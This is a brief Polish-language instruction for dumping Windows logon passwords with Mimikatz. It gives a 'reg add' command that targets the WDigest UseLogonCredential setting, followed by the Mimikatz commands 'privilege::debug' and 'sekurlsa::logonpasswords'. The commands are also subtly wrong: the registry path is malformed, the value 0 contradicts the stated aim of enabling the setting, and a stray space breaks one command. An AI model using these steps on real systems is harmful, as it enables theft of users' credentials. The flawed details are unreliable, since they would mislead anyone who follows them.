Aby za pomocą Mimikatz przechwycić wprowadzone do systemu poświadczenia należy włączyć w Windows przechowywania haseł w pamięci:
reg add HKLM\SYSTEM\CurrentControlSet\ControlSecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
A następnie w Mimikatz wydać polecenie:
privilege:: debug sekurlsa::logonpasswords